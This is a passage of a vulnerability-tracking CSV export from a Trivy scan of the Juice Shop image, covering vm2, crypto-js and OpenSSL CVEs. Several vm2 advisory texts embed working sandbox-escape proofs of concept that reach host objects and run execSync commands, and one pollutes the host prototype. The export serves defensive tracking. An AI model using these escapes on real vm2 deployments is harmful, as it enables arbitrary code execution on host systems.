+,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.598170+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H,10.0,,,0,2026-05-12,,,"vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE vm2's bridge exposes mutable proxies for real host-realm intrinsic prototypes and then forwards sandbox writes into the underlying host objects with otherReflectSet() and otherReflectDefineProperty(), which lets attacker-controlled JavaScript running in a default VM or inherited NodeVM mutate shared host Object.prototype, Array.prototype, and Function.prototype from inside the sandbox. NEWLINE NEWLINE ### Details NEWLINE BaseHandler.apply() unwraps sandbox-controlled receivers and arguments with otherFromThis() / otherFromThisArguments() and then directly invokes the real host function with ret = otherReflectApply(object, context, args), so any default-exposed host function that can surface a prototype getter becomes a prototype-walking primitive ([lib/bridge.js:665-676](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L665-L676)). BaseHandler.get() special-cases __proto__ and returns the host-side descriptor or proxy target prototype, which is enough for the attacker to reuse the host __lookupGetter__('__proto__') accessor repeatedly until the walk lands on host Object.prototype, Array.prototype, or Function.prototype ([lib/bridge.js:590-616](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L590-L616)). Once the attacker has a proxy to a host intrinsic prototype, BaseHandler.set() performs value = otherFromThis(value); return otherReflectSet(object, key, value) === true;, which writes attacker-controlled data directly into the shared host object instead of keeping the mutation sandbox-local; BaseHandler.defineProperty() repeats the same design at otherReflectDefineProperty(object, prop, otherDesc) for descriptor-based writes ([lib/bridge.js:641-649](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L641-L649), [lib/bridge.js:753-774](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L753-L774)). Existing validation does not stop the attack because the constructor filter only blocks one dangerous-property access pattern, setPrototypeOf() only blocks prototype replacement rather than ordinary property assignment, and containsDangerousConstructor() only protects one later re-unwrapping path instead of the initial host-prototype write sink ([lib/bridge.js:494-530](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L494-L530), [lib/bridge.js:595-610](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L595-L610), [lib/bridge.js:660-662](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L660-L662)). NEWLINE NEWLINE ### PoC NEWLINE Run the following code snippet and observe that the value of vm2EscapeMarker is polluted: NEWLINE ``` NEWLINE const { VM } = require('vm2'); NEWLINE const vm = new VM(); NEWLINE vm.run(` NEWLINE const g = ({}).__lookupGetter__; NEWLINE const a = Buffer.apply; NEWLINE const p = a.apply(g, [Buffer, ['__proto__']]); NEWLINE const hostObjectProto = p.call(p.call(p.call(p.call(Buffer.of())))); NEWLINE hostObjectProto.vm2EscapeMarker = 'polluted-object-prototype'; NEWLINE `); NEWLINE console.log({}.vm2EscapeMarker) NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE Sandbox escape and prototype pollution. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,52ffb47cf0a7369f94bfb744170c2948ded011c5b4ff82bef1978bfed92790ea,229,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.598225+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44005 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.598178+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44005,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],crypto-js,3.3.0,2026-05-12 17:37:05.025779+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N,9.1,,,328,2026-05-12,,,"crypto-js: PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.2.0 NEWLINE NEWLINE crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 iterations. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/crypto-js/package.json,,True,,False,False,,False,,a95f6cd299da2691e4707edf2bfc63bbc34f2c4d4646f48da9353a65346f2f87,85,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.025834+00:00,,,,,0,[],4.2.0,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-46233 NEWLINE https://github.com/brix/crypto-js NEWLINE https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a NEWLINE https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf NEWLINE https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-46233 NEWLINE https://ubuntu.com/security/notices/USN-6753-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-46233,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-46233 Crypto-Js 3.3.0,False,False,,2026-05-12 17:37:05.025787+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-46233,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.882877+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,787,2026-05-12,,,"openssl: OpenSSL: Heap buffer overflow on 32-bit systems from large X.509 certificate processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: Converting an excessively large OCTET STRING value to NEWLINE a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. NEWLINE NEWLINE Impact summary: A heap buffer overflow may lead to a crash or possibly NEWLINE an attacker controlled code execution or other undefined behavior. NEWLINE NEWLINE If an attacker can supply a crafted X.509 certificate with an excessively NEWLINE large OCTET STRING value in extensions such as the Subject Key Identifier NEWLINE (SKID) or Authority Key Identifier (AKID) which are being converted to hex, NEWLINE the size of the buffer needed for the result is calculated as multiplication NEWLINE of the input length by 3. On 32 bit platforms, this multiplication may overflow NEWLINE resulting in the allocation of a smaller buffer and a heap buffer overflow. NEWLINE NEWLINE Applications and services that print or log contents of untrusted X.509 NEWLINE certificates are vulnerable to this issue. As the certificates would have NEWLINE to have sizes of over 1 Gigabyte, printing or logging such certificates NEWLINE is a fairly unlikely operation and only 32 bit platforms are affected, NEWLINE this issue was assigned Low severity. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the affected code is outside the OpenSSL FIPS module boundary. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,13b52f342da2cf2e5e9fd17bd2cae3b7a273032681fc55fe07ca5d3296e23105,50,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.882933+00:00,,,,,0,[],3.0.19-1~deb12u2,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31789 NEWLINE https://github.com/advisories/GHSA-j79m-9jxq-788r NEWLINE https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde NEWLINE https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf NEWLINE https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49 NEWLINE https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9 NEWLINE https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31789 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31789 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-31789 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.882885+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31789,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.878740+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,787,2026-05-12,,,"openssl: OpenSSL: Remote code execution or Denial of Service via oversized Initialization Vector in CMS parsing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.18-1~deb12u2 NEWLINE NEWLINE Issue summary: Parsing CMS AuthEnvelopedData or EnvelopedData message with NEWLINE maliciously crafted AEAD parameters can trigger a stack buffer overflow. NEWLINE NEWLINE Impact summary: A stack buffer overflow may lead to a crash, causing Denial NEWLINE of Service, or potentially remote code execution. NEWLINE NEWLINE When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as NEWLINE AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is NEWLINE copied into a fixed-size stack buffer without verifying that its length fits NEWLINE the destination. An attacker can supply a crafted CMS message with an NEWLINE oversized IV, causing a stack-based out-of-bounds write before any NEWLINE authentication or tag verification occurs. NEWLINE NEWLINE Applications and services that parse untrusted CMS or PKCS#7 content using NEWLINE AEAD ciphers (e.g., S/MIME (Auth)EnvelopedData with AES-GCM) are vulnerable. NEWLINE Because the overflow occurs prior to authentication, no valid key material NEWLINE is required to trigger it. While exploitability to remote code execution NEWLINE depends on platform and toolchain mitigations, the stack-based write NEWLINE primitive represents a severe risk. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the CMS implementation is outside the OpenSSL FIPS module NEWLINE boundary. NEWLINE NEWLINE OpenSSL 3.6, 3.5, 3.4, 3.3 and 3.0 are vulnerable to this issue. NEWLINE NEWLINE OpenSSL 1.1.1 and 1.0.2 are not affected by this issue. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,bf628a11337392cb51a2eaae176d69bd431fee68b6ede424c63cf8e3a4ceb988,49,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.878799+00:00,,,,,0,[],3.0.18-1~deb12u2,,S0,False,,,,,,,,False,http://www.openwall.com/lists/oss-security/2026/01/27/10 NEWLINE http://www.openwall.com/lists/oss-security/2026/02/25/6 NEWLINE https://access.redhat.com/errata/RHSA-2026:1473 NEWLINE https://access.redhat.com/security/cve/CVE-2025-15467 NEWLINE https://bugzilla.redhat.com/2430375 NEWLINE https://bugzilla.redhat.com/2430376 NEWLINE https://bugzilla.redhat.com/2430377 NEWLINE https://bugzilla.redhat.com/2430378 NEWLINE https://bugzilla.redhat.com/2430379 NEWLINE https://bugzilla.redhat.com/2430380 NEWLINE https://bugzilla.redhat.com/2430381 NEWLINE https://bugzilla.redhat.com/2430386 NEWLINE https://bugzilla.redhat.com/2430387 NEWLINE https://bugzilla.redhat.com/2430388 NEWLINE https://bugzilla.redhat.com/2430389 NEWLINE https://bugzilla.redhat.com/2430390 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430375 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430376 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430377 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430378 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430379 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430380 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430381 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430387 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430388 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430389 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430390 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796 NEWLINE https://errata.almalinux.org/9/ALSA-2026-1473.html NEWLINE https://errata.rockylinux.org/RLSA-2026:1473 NEWLINE https://github.com/advisories/GHSA-wvhq-3h88-rf6g NEWLINE https://github.com/guiimoraes/CVE-2025-15467 NEWLINE https://github.com/openssl/openssl/commit/2c8f0e5fa9b6ee5508a0349e4572ddb74db5a703 NEWLINE https://github.com/openssl/openssl/commit/5f26d4202f5b89664c5c3f3c62086276026ba9a9 NEWLINE https://github.com/openssl/openssl/commit/6ced0fe6b10faa560e410e3ee8d6c82f06c65ea3 NEWLINE https://github.com/openssl/openssl/commit/ce39170276daec87f55c39dad1f629b56344429e NEWLINE https://github.com/openssl/openssl/commit/d0071a0799f20cc8101730145349ed4487c268dc NEWLINE https://linux.oracle.com/cve/CVE-2025-15467.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50081.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-15467 NEWLINE https://openssl-library.org/news/secadv/20260127.txt NEWLINE https://ubuntu.com/security/notices/USN-7980-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-15467,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2025-15467 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.878753+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-15467,debian; os-pkgs,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.594478+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H,10.0,,,0,2026-05-12,,,"vm2 Access to Host Object Enables Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete. NEWLINE NEWLINE ### Details NEWLINE NEWLINE There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)` NEWLINE NEWLINE ### PoC NEWLINE NEWLINE ```js NEWLINE const g = {}.__lookupGetter__; NEWLINE const a = Buffer.apply; NEWLINE const p = a.apply(g, [Buffer, ['__proto__']]); NEWLINE const o = p.call(p.call(a)); NEWLINE const HObject = o.constructor; NEWLINE sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); NEWLINE NEWLINE const obj = { NEWLINE [sym]: (depth, opt, inspect) => { NEWLINE inspect.constructor(""return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})"")(); NEWLINE }, NEWLINE valueOf: undefined, NEWLINE constructor: undefined, NEWLINE }; NEWLINE NEWLINE WebAssembly.compileStreaming(obj).catch(() => {}); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE NEWLINE Sandbox Escape -> RCE NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,a1b1a8076ae053df37036ac1c55bc64624b729724438ef76291ec568a7a60775,228,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.594531+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-43997 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.594486+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-43997,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.590034+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"VM2 Has a Sandbox Escape Issue via SuppressedError NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,fbc5f2b1080189465d1f7e9b9430895aa09874b1963aa57b05fc6bf31206b3d6,227,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.590137+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0 NEWLINE https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f NEWLINE https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca NEWLINE https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d NEWLINE https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26332,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-26332 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.590049+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26332,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.585686+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability through the inspect function. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,61ef3cdda6ac61dd695901bcebc8c74ecff1449cdaff98c4dfae567d0fb28ace,226,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.585740+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24781 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189 NEWLINE https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c NEWLINE https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24781 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24781,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-24781 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.585694+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24781,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.614320+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,0,2026-05-12,,,"vm2 has Sandbox Breakout Through Null Proto Exception NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.2 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. NEWLINE NEWLINE ### Details NEWLINE NEWLINE In `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object. NEWLINE NEWLINE ### PoC NEWLINE NEWLINE ```js NEWLINE const {VM} = require(""vm2""); NEWLINE const vm = new VM(); NEWLINE console.log(vm.run(` NEWLINE const o = {__proto__: null}; NEWLINE try { NEWLINE throw o; NEWLINE } catch (e) { NEWLINE e.f = Buffer.prototype.inspect NEWLINE o.f.constructor(""return process"")().mainModule.require('child_process').execSync('touch pwned'); NEWLINE } NEWLINE `)); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE NEWLINE Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,e344b6101c174de0ac4c738325937fa30e58b6b6e74297948b9ad0e1a379862e,233,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.614377+00:00,,,,,0,[],3.11.2,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44009 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.614328+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44009,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.582207+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"VM2 Has Sandbox Breakout Through Promise Species NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.10.5 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,c7338ed91feca6e53848ab20d356c24ff45950c30078024d7a888d380a15be8e,225,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.582262+00:00,,,,,0,[],3.10.5,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.10.5 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24120,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-24120 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.582215+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24120,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.578357+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"VM2 Sandbox Breakout Through __lookupGetter__ NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,71fb78161786147968d1282c1e5c0728761b6ce7ed89f8c21738da6fd22304b4,224,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.578414+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3 NEWLINE https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24118,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-24118 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.578366+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24118,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.574079+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"vm2 has a Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.10.2 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object. Version 3.10.2 fixes the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,4af47120ff5cf901b0c3170ee67cd5b2b1ec9eb55fd303e5d37901aa5d2d0df5,223,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.574165+00:00,,,,,0,[],3.10.2,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29 NEWLINE 